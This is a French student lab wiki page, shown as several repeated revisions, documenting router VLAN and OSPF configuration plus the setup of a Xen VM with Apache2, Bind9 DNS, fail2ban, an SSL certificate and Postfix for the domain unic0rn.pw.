Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
<br />
[[File:Magic.gif]]<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
== Attaque du WiFi ==</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35412
TP sysres IMA2a5 2016/2017 G1
2016-11-25T09:11:52Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
<br />
[[File:Magic.gif]]<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35407
TP sysres IMA2a5 2016/2017 G1
2016-11-25T08:40:59Z
<p>Dfourny : /* HTTPS */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
<br />
[[File:Magic.gif]]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Magic.gif&diff=35406
Fichier:Magic.gif
2016-11-25T08:40:06Z
<p>Dfourny : </p>
<hr />
<div></div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35405
TP sysres IMA2a5 2016/2017 G1
2016-11-25T08:23:15Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
